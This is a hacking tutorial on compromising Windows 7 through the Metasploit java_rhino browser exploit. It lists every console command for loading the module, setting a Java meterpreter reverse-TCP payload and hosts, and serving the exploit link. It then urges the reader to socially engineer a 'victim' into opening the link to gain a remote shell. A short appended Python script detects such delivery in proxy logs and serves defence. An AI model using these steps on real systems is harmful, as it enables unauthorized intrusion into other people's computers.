Backtrack java rhino exploit

Browser Java Rhino exploit Tutorial


We are going to pwn Windows 7 with a Java exploit called the Java Rhino exploit. Here I quote the Armitage console's description of the exploit: "This module exploits a vulnerability in the Rhino Script Engine that can be used by a Java Applet to run arbitrary code outside of the sandbox." The vulnerability affects Java version 7 and earlier versions, and should work on any browser: Firefox, Safari, Internet Explorer, Google Chrome, etc.
First of all, update Metasploit with the command #msfupdate to make sure that the above exploit is included in your BackTrack exploit database. Then run:

#msfconsole

Then use this exploit:


#use exploit/multi/browser/java_rhino


Next set payload:


#set payload java/meterpreter/reverse_tcp





At this point, type the following commands. The first one sets up the server:


#set srvhost 192.168.1.6

In this case, 192.168.1.6 is my internal IP; replace this value with your own IP. If you don't know how to get your IP address, just open a terminal and type: #ifconfig. The next command defines the port of the server, which is usually port 80.


#set srvport 80

The next command sets the URI path of the exploit:


#set uripath java_rhino

#set lhost 192.168.1.6


#set lport 443





Notice also that srvhost and lhost have the same IP address. Finally, type this command and wait for a connection:



#exploit







A link has been generated: Local IP: http://192.168.1.6:80/java_rhino. Copy the link and send it to your victim. Once you succeed in "social engineering" the link to a victim, the sending stage starts, and you'll have a Java meterpreter session.






A meterpreter session will be created.
That's it, Windows 7 is pwned =)
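
Seen from the defender's side, the delivery above leaves a trace in web proxy logs: a Java plugin from an affected version fetches content from a host addressed by raw IP, like the http://192.168.1.6:80/java_rhino link. The sketch below is an added example, not part of the original tutorial or of Metasploit. It assumes a simple constructed log format, that JVM-originated requests carry a `Java/1.x` User-Agent token, and uses the "version 7 and earlier" range quoted above as its threshold.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# Constructed sample lines; format (client, URL, quoted UA) and applet.jar path are assumed.
SAMPLE_LOG = """\
192.168.1.20 http://192.168.1.6:80/java_rhino "Mozilla/5.0 (Windows NT 6.1; rv:8.0) Gecko/20100101 Firefox/8.0"
192.168.1.20 http://192.168.1.6:80/java_rhino/applet.jar "Mozilla/4.0 (Windows 7 6.1) Java/1.6.0_27"
192.168.1.21 http://updates.example.com/app/launcher.jar "Mozilla/4.0 (Windows 7 6.1) Java/1.7.0_45"
192.168.1.22 http://10.0.0.8:8080/tool.jar "Mozilla/4.0 (Windows 7 6.1) Java/1.8.0_20"
not a log line
"""

LINE_RE = re.compile(r'^(\S+)\s+(\S+)\s+"([^"]*)"$')
JAVA_UA_RE = re.compile(r'\bJava/1\.(\d+)\.')  # e.g. Java/1.6.0_27 -> 6


def host_is_raw_ip(url):
    """True when the URL's host is an IP literal rather than a DNS name."""
    try:
        ipaddress.ip_address(urlsplit(url).hostname or "")
        return True
    except ValueError:
        return False


def java_major(user_agent):
    """Return the Java major version from a JVM User-Agent, or None."""
    m = JAVA_UA_RE.search(user_agent)
    return int(m.group(1)) if m else None


def find_suspicious(log_text, max_affected_major=7):
    """Flag JVM-originated requests to raw-IP hosts from Java <= max_affected_major."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # skip malformed lines instead of failing
        client, url, ua = m.groups()
        major = java_major(ua)
        if major is not None and major <= max_affected_major and host_is_raw_ip(url):
            hits.append({"client": client, "url": url, "java_major": major})
    return hits


if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_LOG):
        print(hit)
```

Internal tools that legitimately load JARs from IP-addressed hosts will also match, so treat hits as leads to review rather than confirmed compromises.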
